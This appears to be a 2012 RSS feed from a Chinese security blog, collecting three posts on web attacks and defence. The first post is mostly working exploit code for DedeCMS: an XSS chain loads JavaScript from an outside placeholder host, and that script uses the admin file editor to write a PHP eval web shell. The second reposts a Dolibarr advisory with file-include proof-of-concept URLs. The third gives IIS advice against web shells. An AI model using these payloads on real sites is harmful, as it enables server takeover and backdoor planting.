<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.feedsky.com/styles/temp01.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.feedsky.com/cnyzy" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/cnyzy" type="application/rss+xml"></fs:self_link><lastBuildDate>Tue, 14 Feb 2012 04:22:39 GMT</lastBuildDate><title>影子鹰安全网络-主站技术BLOG</title><description>影子鹰安全网络-主站技术BLOG</description><image><url>http://www.feedsky.com/feed/cnyzy/sc/gif</url><title>影子鹰安全网络-主站技术BLOG</title><link>http://www.cnyzy.cn</link></image><link>http://www.cnyzy.cn</link><language>zh-cn</language><copyright>Powered by L-Blog, Some Rights Reserved By Alpar</copyright><pubDate>Tue, 14 Feb 2012 04:22:39 GMT</pubDate><item><title>DEDECMS XSS GETSHeLL 通杀所有版本</title><link>http://www.cnyzy.cn/blogview.asp?logID=1807</link><content:encoded>&lt;p id=fp&gt;&amp;lt;style&amp;gt;@import´&lt;a href=&quot;http://xxx.com/xss.css&quot; target=&quot;_blank&quot;&gt;http://xxx.com/xss.css&lt;/a&gt;´;&amp;lt;/style&amp;gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xss.css内容：&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;body{background-image:url(´javascript:document.write(“&amp;lt;script&amp;nbsp;src=http://xxx.com/logo.jpg&amp;gt;&amp;lt;/script&amp;gt;”)´)}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;logo.jpg内容：&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;var&amp;nbsp;request&amp;nbsp;=&amp;nbsp;false;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;if(window.XMLHttpRequest)&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;request&amp;nbsp;=&amp;nbsp;new&amp;nbsp;XMLHttpRequest();&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;if(request.overrideMimeType)&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;request.overrideMimeType(´text/xml´);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;else&amp;nbsp;if(window.ActiveXObject)&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;var&amp;nbsp;versions&amp;nbsp;=&amp;nbsp;[´&lt;a href=&quot;http://www.microsoft.com/china/homepage/ms.htm&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;images/keywords/microsoft.gif&quot; border=&quot;0&quot; align=&quot;absmiddle&quot;&gt; Microsoft&lt;/a&gt;.XMLHTTP´,&amp;nbsp;´MSXML.XMLHTTP´,&amp;nbsp;´&lt;a href=&quot;http://www.microsoft.com/china/homepage/ms.htm&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;images/keywords/microsoft.gif&quot; border=&quot;0&quot; align=&quot;absmiddle&quot;&gt; Microsoft&lt;/a&gt;.XMLHTTP´,&amp;nbsp;´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´,&amp;nbsp;´Msxml2.XMLHTTP.4.0´,&amp;nbsp;´MSXML2.XMLHTTP.3.0´,&amp;nbsp;´MSXML2.XMLHTTP´];&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;for(var&amp;nbsp;i=0;&amp;nbsp;i&amp;lt;versions.length;&amp;nbsp;i++)&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;try&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;request&amp;nbsp;=&amp;nbsp;new&amp;nbsp;ActiveXObject(versions[i]);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;catch(e)&amp;nbsp;{}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp=request;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;function&amp;nbsp;getFolder(&amp;nbsp;url&amp;nbsp;){&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;obj&amp;nbsp;=&amp;nbsp;url.split(´/´)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;return&amp;nbsp;obj[obj.length-2]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;oUrl&amp;nbsp;=&amp;nbsp;top.location.href;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;u&amp;nbsp;=&amp;nbsp;getFolder(oUrl);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;add_admin();&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;function&amp;nbsp;add_admin(){&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;var&amp;nbsp;url=&amp;nbsp;“/”+u+”/sys_sql_query.php”;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;var&amp;nbsp;params&amp;nbsp;=”fmdo=edit&amp;amp;backurl=&amp;amp;activepath=%2Fdata&amp;amp;filename=haris.php&amp;amp;str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&amp;amp;B1=++%E4%BF%9D+%E5%AD%98++”;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp.open(“POST”,&amp;nbsp;url,&amp;nbsp;true);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp.setRequestHeader(“Content-type”,&amp;nbsp;“application/x-www-form-urlencoded”);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp.setRequestHeader(“Content-length”,&amp;nbsp;params.length);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp.setRequestHeader(“Connection”,&amp;nbsp;“Keep-Alive”);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xmlhttp.send(params);&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;}&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;br&gt;1&amp;nbsp;记住这个js脚本吧，get&amp;nbsp;post&amp;nbsp;cookies都可以用这种模式。&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;2&amp;nbsp;这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax).&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/605529337/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1807&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1807</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1807</wfw:commentRss><description>&lt;p id=fp&gt;&amp;lt;style&amp;gt;@import´&lt;a href=&quot;http://xxx.com/xss.css&quot; target=&quot;_blank&quot;&gt;http://xxx.com/xss.css&lt;/a&gt;´;&amp;lt;/style&amp;gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;xss.css内容：&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/605529337/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1807&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1807#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1807</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1807</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/605529337/1477126</fs:itemid></item><item><title>Dolibarr CMS v3.2.0 Alpha</title><link>http://www.cnyzy.cn/blogview.asp?logID=1806</link><content:encoded>&lt;p id=fp&gt;&lt;strong&gt;Dolibarr&amp;nbsp;CMS&amp;nbsp;v3.2.0&amp;nbsp;Alpha&amp;nbsp;-&amp;nbsp;File&amp;nbsp;Include&amp;nbsp;Vulnerabilities&lt;/strong&gt;&lt;br&gt;&lt;br&gt;Title:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;======&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Dolibarr&amp;nbsp;CMS&amp;nbsp;v3.2.0&amp;nbsp;Alpha&amp;nbsp;-&amp;nbsp;File&amp;nbsp;Include&amp;nbsp;Vulnerabilities&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Date:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=====&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;2012-02-07&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;References:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;===========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.vulnerability-lab.com/get_content.php?id=428&amp;nbsp;&amp;nbsp;&quot; target=&quot;_blank&quot;&gt;http://www.vulnerability-lab.com/get_content.php?id=428&amp;nbsp;&amp;nbsp;&lt;/a&gt;&lt;br&gt;&lt;br&gt;VL-ID:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=====&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;428&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Introduction:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=============&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Dolibarr&amp;nbsp;ERP&amp;nbsp;&amp;amp;&amp;nbsp;CRM&amp;nbsp;is&amp;nbsp;a&amp;nbsp;modern&amp;nbsp;software&amp;nbsp;to&amp;nbsp;manage&amp;nbsp;your&amp;nbsp;company&amp;nbsp;or&amp;nbsp;foundation&amp;nbsp;activity&amp;nbsp;(contacts,&amp;nbsp;suppliers,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;invoices,&amp;nbsp;orders,&amp;nbsp;stocks,&amp;nbsp;agenda,&amp;nbsp;...).&amp;nbsp;It&amp;nbsp;s&amp;nbsp;an&amp;nbsp;opensource&amp;nbsp;free&amp;nbsp;software&amp;nbsp;designed&amp;nbsp;for&amp;nbsp;small&amp;nbsp;and&amp;nbsp;medium&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;companies,&amp;nbsp;foundations&amp;nbsp;and&amp;nbsp;freelances.&amp;nbsp;You&amp;nbsp;can&amp;nbsp;install,&amp;nbsp;use&amp;nbsp;and&amp;nbsp;distribute&amp;nbsp;it&amp;nbsp;as&amp;nbsp;a&amp;nbsp;standalone&amp;nbsp;application&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;or&amp;nbsp;as&amp;nbsp;a&amp;nbsp;web&amp;nbsp;application&amp;nbsp;(on&amp;nbsp;mutualized&amp;nbsp;or&amp;nbsp;dedicated&amp;nbsp;server,&amp;nbsp;or&amp;nbsp;on&amp;nbsp;SaaS&amp;nbsp;or&amp;nbsp;Cloud&amp;nbsp;solutions)&amp;nbsp;and&amp;nbsp;use&amp;nbsp;it&amp;nbsp;with&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;any&amp;nbsp;devices&amp;nbsp;(desktop,&amp;nbsp;smartphone,&amp;nbsp;tablet).&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;(Copy&amp;nbsp;of&amp;nbsp;the&amp;nbsp;Vendor&amp;nbsp;Homepage:&amp;nbsp;&lt;a href=&quot;http://www.dolibarr.org/)&amp;nbsp;&amp;nbsp;&quot; target=&quot;_blank&quot;&gt;http://www.dolibarr.org/)&amp;nbsp;&amp;nbsp;&lt;/a&gt;&lt;br&gt;&lt;br&gt;Abstract:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerability-Lab&amp;nbsp;researcher&amp;nbsp;discovered&amp;nbsp;a&amp;nbsp;multiple&amp;nbsp;File&amp;nbsp;Include&amp;nbsp;Vulnerabilities&amp;nbsp;on&amp;nbsp;Dolibarrs&amp;nbsp;CMS&amp;nbsp;v3.2.0&amp;nbsp;Alpha.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Report-Timeline:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;================&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;2011-02-08:&amp;nbsp;Public&amp;nbsp;or&amp;nbsp;Non-Public&amp;nbsp;Disclosure&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Status:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Published&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Exploitation-Technique:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=======================&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Remote&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Severity:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Critical&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Details:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Multiple&amp;nbsp;File&amp;nbsp;Include&amp;nbsp;Vulnerabilities&amp;nbsp;are&amp;nbsp;detected&amp;nbsp;on&amp;nbsp;Dolibarrs&amp;nbsp;Content&amp;nbsp;Management&amp;nbsp;System&amp;nbsp;v3.2.0&amp;nbsp;Alpha.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;The&amp;nbsp;vulnerability&amp;nbsp;allows&amp;nbsp;an&amp;nbsp;attacker&amp;nbsp;(remote)&amp;nbsp;or&amp;nbsp;local&amp;nbsp;low&amp;nbsp;privileged&amp;nbsp;user&amp;nbsp;account&amp;nbsp;to&amp;nbsp;request&amp;nbsp;local&amp;nbsp;web-server&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;or&amp;nbsp;system&amp;nbsp;files.&amp;nbsp;&amp;nbsp;Successful&amp;nbsp;exploitation&amp;nbsp;of&amp;nbsp;the&amp;nbsp;vulnerability&amp;nbsp;results&amp;nbsp;in&amp;nbsp;dbms&amp;nbsp;&amp;amp;&amp;nbsp;application&amp;nbsp;compromise.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerable&amp;nbsp;Module(s):&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+]&amp;nbsp;?modulepart=project&amp;amp;file=&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[+]&amp;nbsp;?action=create&amp;amp;actioncode=AC_RDV&amp;amp;contactid=1&amp;amp;socid=1&amp;amp;backtopage=&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Picture(s):&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;../1.png&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;../2.png&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Proof&amp;nbsp;of&amp;nbsp;Concept:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=================&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;The&amp;nbsp;vulnerabilities&amp;nbsp;can&amp;nbsp;be&amp;nbsp;exploited&amp;nbsp;by&amp;nbsp;remote&amp;nbsp;attackers&amp;nbsp;or&amp;nbsp;local&amp;nbsp;low&amp;nbsp;privileged&amp;nbsp;user&amp;nbsp;accounts.&amp;nbsp;For&amp;nbsp;demonstration&amp;nbsp;or&amp;nbsp;reproduce&amp;nbsp;...&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://server/document.php?modulepart=project&amp;amp;file=../&quot; target=&quot;_blank&quot;&gt;http://server/document.php?modulepart=project&amp;amp;file=../&lt;/a&gt;[FILE&amp;nbsp;INCLUDE&amp;nbsp;VULNERABILITY!]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://server/comm/action/fiche.php?action=create&amp;amp;actioncode=AC_RDV&amp;amp;contactid=1&amp;amp;socid=1&amp;amp;backtopage=../common/&quot; target=&quot;_blank&quot;&gt;http://server/comm/action/fiche.php?action=create&amp;amp;actioncode=AC_RDV&amp;amp;contactid=1&amp;amp;socid=1&amp;amp;backtopage=../common/&lt;/a&gt;[FILE&amp;nbsp;INCLUDE&amp;nbsp;VULNERABILITY!]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Risk:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;=====&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;The&amp;nbsp;security&amp;nbsp;riks&amp;nbsp;of&amp;nbsp;the&amp;nbsp;file&amp;nbsp;include&amp;nbsp;vulnerabilities&amp;nbsp;are&amp;nbsp;estimated&amp;nbsp;as&amp;nbsp;high(+).&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Credits:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Vulnerability&amp;nbsp;Research&amp;nbsp;Laboratory&amp;nbsp;-&amp;nbsp;Benjamin&amp;nbsp;Kunz&amp;nbsp;Mejri&amp;nbsp;&amp;amp;&amp;nbsp;Ucha&amp;nbsp;Gobejishvili&amp;nbsp;(longrifle0x)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Disclaimer:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;===========&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;The&amp;nbsp;information&amp;nbsp;provided&amp;nbsp;in&amp;nbsp;this&amp;nbsp;advisory&amp;nbsp;is&amp;nbsp;provided&amp;nbsp;as&amp;nbsp;it&amp;nbsp;is&amp;nbsp;without&amp;nbsp;any&amp;nbsp;warranty.&amp;nbsp;Vulnerability-Lab&amp;nbsp;disclaims&amp;nbsp;all&amp;nbsp;warranties,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;either&amp;nbsp;expressed&amp;nbsp;or&amp;nbsp;implied,&amp;nbsp;including&amp;nbsp;the&amp;nbsp;warranties&amp;nbsp;of&amp;nbsp;merchantability&amp;nbsp;and&amp;nbsp;capability&amp;nbsp;for&amp;nbsp;a&amp;nbsp;particular&amp;nbsp;purpose.&amp;nbsp;Vulnerability-&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Lab&amp;nbsp;or&amp;nbsp;its&amp;nbsp;suppliers&amp;nbsp;are&amp;nbsp;not&amp;nbsp;liable&amp;nbsp;in&amp;nbsp;any&amp;nbsp;case&amp;nbsp;of&amp;nbsp;damage,&amp;nbsp;including&amp;nbsp;direct,&amp;nbsp;indirect,&amp;nbsp;incidental,&amp;nbsp;consequential&amp;nbsp;loss&amp;nbsp;of&amp;nbsp;business&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;profits&amp;nbsp;or&amp;nbsp;special&amp;nbsp;damages,&amp;nbsp;even&amp;nbsp;if&amp;nbsp;Vulnerability-Lab&amp;nbsp;or&amp;nbsp;its&amp;nbsp;suppliers&amp;nbsp;have&amp;nbsp;been&amp;nbsp;advised&amp;nbsp;of&amp;nbsp;the&amp;nbsp;possibility&amp;nbsp;of&amp;nbsp;such&amp;nbsp;damages.&amp;nbsp;Some&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;states&amp;nbsp;do&amp;nbsp;not&amp;nbsp;allow&amp;nbsp;the&amp;nbsp;exclusion&amp;nbsp;or&amp;nbsp;limitation&amp;nbsp;of&amp;nbsp;liability&amp;nbsp;for&amp;nbsp;consequential&amp;nbsp;or&amp;nbsp;incidental&amp;nbsp;damages&amp;nbsp;so&amp;nbsp;the&amp;nbsp;foregoing&amp;nbsp;limitation&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;may&amp;nbsp;not&amp;nbsp;apply.&amp;nbsp;Any&amp;nbsp;modified&amp;nbsp;copy&amp;nbsp;or&amp;nbsp;reproduction,&amp;nbsp;including&amp;nbsp;partially&amp;nbsp;usages,&amp;nbsp;of&amp;nbsp;this&amp;nbsp;file&amp;nbsp;requires&amp;nbsp;authorization&amp;nbsp;from&amp;nbsp;Vulnerability-&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Lab.&amp;nbsp;Permission&amp;nbsp;to&amp;nbsp;electronically&amp;nbsp;redistribute&amp;nbsp;this&amp;nbsp;alert&amp;nbsp;in&amp;nbsp;its&amp;nbsp;unmodified&amp;nbsp;form&amp;nbsp;is&amp;nbsp;granted.&amp;nbsp;All&amp;nbsp;other&amp;nbsp;rights,&amp;nbsp;including&amp;nbsp;the&amp;nbsp;use&amp;nbsp;of&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;other&amp;nbsp;media,&amp;nbsp;are&amp;nbsp;reserved&amp;nbsp;by&amp;nbsp;Vulnerability-Lab&amp;nbsp;or&amp;nbsp;its&amp;nbsp;suppliers.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Copyright&amp;nbsp;�&amp;nbsp;2011|Vulnerability-Lab&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;--&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Website:&amp;nbsp;www.vulnerability-lab.com&amp;nbsp;;&amp;nbsp;vuln-lab.com&amp;nbsp;or&amp;nbsp;vuln-db.com&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;Contact:&amp;nbsp;admin@vulnerability-lab.com&amp;nbsp;or&amp;nbsp;support@vulnerability-lab.com&amp;nbsp;&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/604936848/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1806&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1806</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1806</wfw:commentRss><description>&lt;p id=fp&gt;&lt;strong&gt;Dolibarr&amp;nbsp;CMS&amp;nbsp;v3.2.0&amp;nbsp;Alpha&amp;nbsp;-&amp;nbsp;File&amp;nbsp;Include&amp;nbsp;Vulnerabilities&lt;/strong&gt;&lt;br&gt;&lt;br&gt;Title:&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;======&amp;nbsp;&amp;nbsp;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/604936848/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1806&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>黑客攻防</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1806#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1806</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1806</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/604936848/1477126</fs:itemid></item><item><title>让webshell无法运行</title><link>http://www.cnyzy.cn/blogview.asp?logID=1805</link><content:encoded>&lt;p id=fp&gt;其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的&lt;br&gt;您试图从目录中执行&amp;nbsp;CGI、ISAPI&amp;nbsp;或其他可执行程序，但该目录不允许执行程序。&lt;br&gt;Interneter服务器管理----IIS中站点目录右键----属性----在主目录中&lt;br&gt;查看“执行权限”一般设置为“纯脚本”，脚本文件才能正常运行，设置为“无”则不能运行&lt;br&gt;&amp;nbsp;&lt;br&gt;把一些图片目录，设置“执行权限”为“无”，即使webshell能上传到此目录，也无法运行！&lt;br&gt;现在很多空间商已经可以设置这样的“执行权限”，但貌似只能设置根目录的，不过已经很好了！&lt;br&gt;这样可以比较有效的防止被别人拿到webshell，但也不是绝对的！&lt;br&gt;有时候也可以构造上传到其他目录或者上一级目录，攻防无绝对！&lt;br&gt;&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/604356892/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1805&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; 